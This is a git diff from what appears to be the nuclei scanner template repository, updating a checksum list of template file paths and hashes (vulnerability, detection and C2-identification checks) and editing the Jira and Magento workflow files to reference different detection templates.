-http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml:5aee1b834fe179eb02f579d48eb80844b45655de +http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml:a672f298bdeb7229948e516f0896af0b81dc398c http/vulnerabilities/wordpress/members-list-xss.yaml:0d3cd6dfd62f57f2b87580fd734f0cd0ea038542 http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:33998037eea7ef54fc357358d9b658eb7095d198 http/vulnerabilities/wordpress/mthemeunus-lfi.yaml:4762667c3e9d02444074b101702919519ab1945a @@ -6083,14 +6244,14 @@ http/vulnerabilities/wordpress/new-user-approve-xss.yaml:c131ac7a92a8eeba645524f http/vulnerabilities/wordpress/newsletter-open-redirect.yaml:2844e738d46a2ea7fd11f3f3d030991fff76ba9f http/vulnerabilities/wordpress/pieregister-open-redirect.yaml:01a32babb23c128ff14bafffe515cce41b76f108 http/vulnerabilities/wordpress/sassy-social-share.yaml:598f684a8766a13380351442dbf6f704fb17a6f8 -http/vulnerabilities/wordpress/seatreg-redirect.yaml:eb55732a5e66bb099b27864850b660d8d11cdb0b +http/vulnerabilities/wordpress/seatreg-redirect.yaml:2353a54f05ef04c1073e5e3476d03a11040efd79 http/vulnerabilities/wordpress/seo-redirection-xss.yaml:454a44ca4825ebc9bf053fb63d2f6fa3920be38d http/vulnerabilities/wordpress/shortcode-lfi.yaml:a4831c71d3dfb86172309164483c1d4423010a75 http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml:c59fc3f1133185c9233cd590084e93f378b25088 http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml:aecf926e08e399a18b560e4099e00d61db26f2eb http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml:b2836e48362f17ec2840942b65a71ddfe2863ecb http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:05061021a06dcdfe5e1529457eeef174a4e75a38 -http/vulnerabilities/wordpress/watu-xss.yaml:4cf327c22aaa7bbff18b4728337721a8f0fb4bcd +http/vulnerabilities/wordpress/watu-xss.yaml:db8c9d286a4ac303da2f7f1b0bef74ad9089a980 http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:616f3ec0d37d9ab54bc4c5aebf89b7a0c75195d5 http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:388fba04ac574d751c590a757943cc5a5a1b5c1e http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:91ffbf4be291968d326e8f1a8ea0aa72c619af81 @@ -6128,7 +6289,7 @@ http/vulnerabilities/wordpress/wp-all-export-xss.yaml:35e14bb77e961fbab46cb894ff http/vulnerabilities/wordpress/wp-altair-listing.yaml:39cb441dec3ea5c1304b108a912a49e9f9aabf6a http/vulnerabilities/wordpress/wp-ambience-xss.yaml:cec1082d931a060bae159a87ea92ea88a490a09b http/vulnerabilities/wordpress/wp-arforms-listing.yaml:915b512e09023510dcb90b3a8cd320162d5fd077 -http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:a28612b08a9441650fefa054e813916bd2ca9a09 +http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:627962385af666eb211d56f079c66b040d1a8fc7 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:fb037b36887d536061e909d40ca51158ddc476e9 http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:370a490ba04a482c541b95bb133b5035906627b3 http/vulnerabilities/wordpress/wp-config-setup.yaml:0335a3c317b01127c7a84396c9bcb3c36158efdc @@ -6171,7 +6332,7 @@ http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:b3e43a5c256e02c4c6f0d524 http/vulnerabilities/wordpress/wp-super-forms.yaml:175ac5300aaa63ac99439a162442d36fb4588d7c http/vulnerabilities/wordpress/wp-sym404.yaml:20343846e467fc03f3345731af11de7c1d2901e9 http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml:16a220c2027a70bec256b40e2a16b9058b2d6724 -http/vulnerabilities/wordpress/wp-touch-redirect.yaml:185a896dc733cc2179221eea8319dcbe7c238e22 +http/vulnerabilities/wordpress/wp-touch-redirect.yaml:71984d730fb95dd2bf348537c0f9dc7439981a88 http/vulnerabilities/wordpress/wp-tutor-lfi.yaml:244d9e503fbc5a963c8277574ed2bf7b31d8b493 http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml:bd89a8fa061dd44f79bb901afd01dae3af5ba039 http/vulnerabilities/wordpress/wp-upload-data.yaml:f771e57ea820c57016b27e2e9c30de6b51a980f3 @@ -6184,7 +6345,7 @@ http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:49c116832c13630 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:e1eb54f2298a43a1264079dccb9ec8cc27981bc4 http/vulnerabilities/wordpress/wpdm-cache-session.yaml:2a06dd6ef037a79077f3997788ab6a25408d6ccf http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml:9ef79571cc611f364df5794d6bf1ba313e64fd3a -http/vulnerabilities/wordpress/wpml-xss.yaml:7fd80df7b628624114af4ed41886e2e63017c1a5 +http/vulnerabilities/wordpress/wpml-xss.yaml:be8ebc66c2f3443f72bbbfae75b68b450ea3f82f http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:6cbcd6ec4668c5ed28b25aad4804fb9e91d06b1d http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:7759b533a9f9217e3b5933fa13428641e9367454 http/vulnerabilities/wordpress/wptouch-xss.yaml:3cdc7148ce1133d068a6956fdfc8ff31a4b6abc7 @@ -6192,27 +6353,29 @@ http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:dacdfb742a867f98ded6 http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:41aef3c39f8704f708b0ff7d2b952facc6b214fd http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:1ac1379d6f765a6008821b965709d63455f1dc81 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f -http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:e5dc912fb2aa477950f52a24a3e4df930f757a48 -http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:69cd3e6c9ad7d8d68119de6c5ca7056f382f92db +http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:5cdad439b1340a471900588ca779c1985c865298 +http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab network/backdoor/backdoored-zte.yaml:3aa481fd5f1c0e8e9853646a7fbca35d927911fa network/cisco-smi-exposure.yaml:89fcf6f71dff1403e1845205656ae049948574aa network/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f network/clickhouse-unauth.yaml:3cc7b0091d65b3beb21e08f357e56f864baac3ab network/cves/2001/CVE-2001-1473.yaml:a0c9a9f2d0c5505dfaa9d612d7ead72950b0badf -network/cves/2011/CVE-2011-2523.yaml:848f49e22f4d53873d7e40f9a47088577033ea65 +network/cves/2011/CVE-2011-2523.yaml:7547cb75a9cca206a0e70cf2a9c2688c0d96b715 network/cves/2015/CVE-2015-3306.yaml:0fac2a8c418bd0e61d4bcf7a2311ade9c3fa3af7 network/cves/2016/CVE-2016-2004.yaml:93b2a159ac689d24eb1ab257ea09769a3b68a263 -network/cves/2016/CVE-2016-3510.yaml:80fc36a3dfa61c4db9521322c96faeb114d3ede0 +network/cves/2016/CVE-2016-3510.yaml:eae8c87554a1a1111f36f5df58301d9c0510a5a7 network/cves/2017/CVE-2017-3881.yaml:2232a12adeab985f6f26ace5601b085d10ca32bc -network/cves/2017/CVE-2017-5645.yaml:838383944ce0dd2ceedc06e30dd241357e1a219b +network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df network/cves/2018/CVE-2018-2628.yaml:745a4bcbf8dacea7659023d8a14b4c58e8a7ca6e -network/cves/2018/CVE-2018-2893.yaml:2d285e0c82f50df6b60172de60eef2aecd66dca8 -network/cves/2020/CVE-2020-11981.yaml:fbe2204ac959995938ba149947878a1de09b2d17 -network/cves/2020/CVE-2020-1938.yaml:14a91d0c0ae9951c40d32e52e6cce1fcc2a301cf +network/cves/2018/CVE-2018-2893.yaml:0a6d9638d166fb7b9c70b66eda35074a3160d35d +network/cves/2020/CVE-2020-11981.yaml:8cf01204e15f9205225a407e3573d04f1a3ebd7d +network/cves/2020/CVE-2020-1938.yaml:f42c5ab49582e8cfb2ef258c578b687c67556a9d network/cves/2020/CVE-2020-7247.yaml:731f878bf6fecab9df6d650f68e391befb479abe network/cves/2021/CVE-2021-44521.yaml:337b7c516051ab9f27e3a87649c82108597cf54d -network/cves/2022/CVE-2022-0543.yaml:7f242f8007fda8725b25fe939e011d50f78835af -network/cves/2022/CVE-2022-31793.yaml:688360e20103aa0c077ecaf244e570f052a12c4d +network/cves/2022/CVE-2022-0543.yaml:12250c6e9c2b36c2d1c286398819688e03f71817 +network/cves/2022/CVE-2022-24706.yaml:c9c9a10852d08107d5818e3ca37d716ebc9936e1 +network/cves/2022/CVE-2022-31793.yaml:e9faa9e6acc71f3b268c39f60f56e4483bd7eb73 +network/cves/2023/CVE-2023-33246.yaml:d4904c6ee3d1774bc926bad481db45aacd24e3f8 network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 network/detect-addpac-voip-gateway.yaml:22e2a91cf086715101f77677b1c4276f6a11ca98 network/detect-jabber-xmpp.yaml:2735b8056f61ce2ccea063d2038838bfbed81a54 @@ -6236,7 +6399,7 @@ network/detection/microsoft-ftp-service.yaml:1eaa699944fa25cb9acd0c5a436be39cd43 network/detection/mikrotik-ftp-server-detect.yaml:91f68300361533ee2617f8ee2ea26cfb32a34067 network/detection/mikrotik-routeros-api.yaml:9dd9b2d64369ee6c7b12055597cbb47888c1501d network/detection/mongodb-detect.yaml:db5c9878c182105556bcd98062b017983a5b61d4 -network/detection/msmq-detect.yaml:8c4464fd4a5b6d30aea24f7e72f285d7288c6566 +network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b network/detection/mysql-detect.yaml:6cf78425430af56bec9a5c143386758c73cde83d network/detection/openssh-detect.yaml:6cb1e5c12365adc92d27c91692a5d2db0dbf14b7 network/detection/pgsql-detect.yaml:42791812cc005376a73b8621d09c7d9fe8a58973 @@ -6244,17 +6407,17 @@ network/detection/pop3-detect.yaml:5f9c7724e984cf9f39248675f8a164551f277905 network/detection/proftpd-server-detect.yaml:a37838e64650accc9a4c8922f1d94040dcd77582 network/detection/rabbitmq-detect.yaml:d9eb2c715fa0173c92f99bad2579506b31de7dde network/detection/rdp-detect.yaml:d7b98101d101ebc9a219d1e2729a6efdc7168eac -network/detection/redis-detect.yaml:01babf0887aed9c6077da749a289de0fb2973a5c +network/detection/redis-detect.yaml:bda8febcacfc294b8b2829c7bffe40fba3a4373e network/detection/riak-detect.yaml:7c7f000c3a4ed240f66dfd59815f7b78a5ea9550 network/detection/rpcbind-portmapper-detect.yaml:4c273210ce8a4e202f14f138175a166db294176a network/detection/rsyncd-service-detect.yaml:c95848165d5726d82a7b49a12cc5396a28d6d91a -network/detection/rtsp-detect.yaml:31c1de0de05689a9d0e11da126b009690dc7a101 +network/detection/rtsp-detect.yaml:a0d5f554bc37b316c57302c98174df4dc13663c0 network/detection/samba-detect.yaml:f22d87e917048d55861d0ba2029541c52cffe9c6 network/detection/smb-detect.yaml:b45723ec2102ebb9355f774e94942b66047ca9f7 network/detection/smtp-detect.yaml:f34814084666d3cf10bc7060fbe8f4aa26ae9179 network/detection/sshd-dropbear-detect.yaml:6de12df88cc72f90f90af1543cb265b63eb0d1bf network/detection/starttls-mail-detect.yaml:44cd708cb4221ab0077fd893d1c17d8a61e60e6f -network/detection/teamspeak3-detect.yaml:f7ff478193760e6e70b318e63029f86da7f5c939 +network/detection/teamspeak3-detect.yaml:f1107f7fbc1242ac9b6cc2f827117a2f279b1396 network/detection/telnet-detect.yaml:098d63f049678037f2cadeaa89b7c89a47a7f2a9 network/detection/totemomail-smtp-detect.yaml:10a3b309c84af101efe271220e26db20506d8f7c network/detection/vmware-authentication-daemon-detect.yaml:d37233d58938b0771b9bb617b0a4ba1780c6c4d8 @@ -6262,16 +6425,16 @@ network/detection/vnc-service-detect.yaml:7f69c25f30229298f2e5a5c54d3939e1c8787f network/detection/weblogic-iiop-detect.yaml:a03a3be23f27736c85b4c17aa3b4122278cfe26a network/detection/weblogic-t3-detect.yaml:0ad1a44a8714bc494333facc2aba5e84bc289893 network/detection/xlight-ftp-service-detect.yaml:85611143ca36a18417bbd0af9d7bd87f57b14fa8 -network/enumeration/beanstalk-service.yaml:5d7442be7a537cd17dfe1cef58a9ea1e9c6dc0b3 -network/enumeration/kafka-topics-list.yaml:1e76541f2cbdd0536626b0f8c0a9cb76e2ea7dea -network/enumeration/mongodb-info-enum.yaml:53a69dde575854464f8c4497364ef5eb9e2a0698 +network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de +network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 +network/enumeration/mongodb-info-enum.yaml:9679f4cf1139d8c1e10152ffc13e61f29e1e9905 network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e7636143 -network/enumeration/smtp/smtp-user-enum.yaml:39c994b63cc0d9623ce9b40fd93a7fadb954575c -network/enumeration/smtp-commands-enum.yaml:7177bfa34aa839323b4b2ebbae3d9a367205fe54 +network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 +network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 network/expn-mail-detect.yaml:bc3c315e851ed7c29b91b6fbfdbcae84929403b7 network/exposed-adb.yaml:257a4b487d9b137291729e6d854ba65b588f6bac network/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3 -network/exposed-redis.yaml:9edb7c70b928a673980c5cc7254602f328c97772 +network/exposed-redis.yaml:d8d81feb18118792c88b7d3349d72d4275b5533a network/exposed-zookeeper.yaml:f1e527d74f8107c9a44e08d75db1db54694dfa96 network/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 network/ftp-weak-credentials.yaml:5b8dbf41a9490d719bb506b2b1942ba10831c9aa @@ -6284,22 +6447,35 @@ network/mysql-native-password.yaml:85827a2b9a5f85a7470a09c3db968ed0d1e22204 network/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 network/sap-router-info-leak.yaml:9bdd720e10f0ed8df787a7ac1cf590ac6650684b network/sap-router.yaml:9fc64b49f5cdadf1b9ea21a9789e418b8683d7f7 -network/tidb-native-password.yaml:ddf91104c2a77e11c27a14eb6616fcac30d21e05 +network/tidb-native-password.yaml:1fab98daa62ee198d3e29cba8990126109534291 network/tidb-unauth.yaml:86629c493264f28814a57e685ecda740799f123e network/vsftpd-backdoor.yaml:6ddecfe71f4c667b9b8fe2495c91ed9c48d5709d +network/vulnerabilities/clockwatch-enterprise-rce.yaml:67c4a02fbc6455b622022ba0d435662d6347c4a7 +ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 +ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a +ssl/c2/cobalt-strike-c2.yaml:68409733bcc9e95861d748f04f935008b787e523 +ssl/c2/covenant-c2-ssl.yaml:8cee367255ac8991147f62d17f65c7b812017ee8 +ssl/c2/dcrat-server-c2.yaml:b02d2def8f288479b8f1cb737314359f7165fd03 +ssl/c2/gozi-malware.yaml:6ee74f0fc8547bb46cbf1786e312a74de4fa5479 +ssl/c2/icedid.yaml:b9632d381fade1fa3163d38d504c01d111720c37 +ssl/c2/metasploit-c2.yaml:4eb556b544c5adda049e118cb0dcde07e26c6f73 +ssl/c2/orcus-rat-c2.yaml:46fa20a8b13acdcc1d1809fa2f66f42ad3e759ad +ssl/c2/posh-c2.yaml:fd5df3096d9fdd0f717d4981e512bd11e56c73b9 +ssl/c2/quasar-rat-c2.yaml:91673602a38a05ebf84560129bf8d7cd389be5ff +ssl/c2/shadowpad-c2.yaml:4796e43add073e860127584997de5ae0431c743b ssl/deprecated-tls.yaml:4983f03793da1c10e18e4ba69424ca9a96da137f ssl/detect-ssl-issuer.yaml:deebea341157b4c25b4fcb9214eb7d2937432cd8 ssl/expired-ssl.yaml:dee1d40292999da4bd603376c1486fa610be435a -ssl/insecure-cipher-suite-detect.yaml:1f617414e6f832f9b2c6e427fc4260057de873a4 -ssl/kubernetes-fake-certificate.yaml:0286c97db2f727273678429d59c56dcc833d1458 +ssl/insecure-cipher-suite-detect.yaml:4620b072fdb8f8a23ab123d488dab26f8758ef19 +ssl/kubernetes-fake-certificate.yaml:5cbb07d098bf70212777aebc12f771a977084f87 ssl/mismatched-ssl-certificate.yaml:3113a963601883f263d6dafe53294d0925f939bd ssl/revoked-ssl-certificate.yaml:25107a90584f63a6d2300d849ba462f9d10bb711 ssl/self-signed-ssl.yaml:50d5647b781a18060f6a8331c74bc2dec118d33b ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 -ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df -templates-checksum.txt:b33f3077879420d5dbf8c6c69876f2d1a4de8004 +ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec +templates-checksum.txt:5b27f85a0d5442ffc25fd8ad5519e2efc58e5eaf wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f @@ -6376,7 +6552,7 @@ workflows/jeedom-workflow.yaml:8b05a4b0873e2d310f108b379192e23e6364cbae workflows/jellyfin-workflow.yaml:217c8c9d83caa1cda5ee6dc5a6532344ea07551d workflows/jenkins-workflow.yaml:c3361d8c83d0de7bf8063cc0ede3f6560aca58d3 workflows/jetty-workflow.yaml:910c838c22989532ce9450b7eac14452e4fcd857 -workflows/jira-workflow.yaml:cad07f068bb3fca74cd0c26acb56683a5f0eba52 +workflows/jira-workflow.yaml:df8099d5d7feadeccf6b5240414a4a8096a188f0 workflows/joomla-workflow.yaml:15c3f53c5e10801be8877c97c8bda7262d6364c2 workflows/kentico-workflow.yaml:5ff7d49cc90a581eeff2b7aacf9346fd8b98fc0f workflows/keycloak-workflow.yaml:e7a4fb15cbd51107269c993cd95479bbeae40595 @@ -6389,7 +6565,7 @@ workflows/laravel-workflow.yaml:6052972be10ed82530c552b202ae1312b286cf12 workflows/liferay-workflow.yaml:5c9448062812f34666f91f20f72cde85acde14dc workflows/lotus-domino-workflow.yaml:6438ab96aa16772ac84cd99d9669dca45664c881 workflows/lucee-workflow.yaml:f68841f0ff09dbc21b25b039a95bb3a1006286ae -workflows/magento-workflow.yaml:e30d34047ba5acfa28645e053365df7fb8008943 +workflows/magento-workflow.yaml:f36841d6fc7192b21c79dd1b94f4584c815a1097 workflows/magmi-workflow.yaml:d825a8b2df4821006c99e34b73bf10afb37dbf4a workflows/maian-workflow.yaml:44841cc57cc1bddf4ede2894783cbd26fe08d57e workflows/mantisbt-workflow.yaml:2983742e70c3c31711cf6339cc3b7ef247f4c9a4 diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 1d7db71f7f..5e184dcfcd 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all Jira related nuclei templates on a given target. workflows: - - template: http/exposed-panels/jira-detect.yaml + - template: http/technologies/jira-detect.yaml subtemplates: - tags: jira \ No newline at end of file diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml index c4a76cbdf7..b62e750416 100644 --- a/workflows/magento-workflow.yaml +++ b/workflows/magento-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all Magento related nuclei templates on a given target. workflows: - - template: http/technologies/magento-detect.yaml + - template: http/technologies/magento-version-detect.yaml subtemplates: - - tags: magento \ No newline at end of file + - template: http/technologies/magento-eol.yaml \ No newline at end of file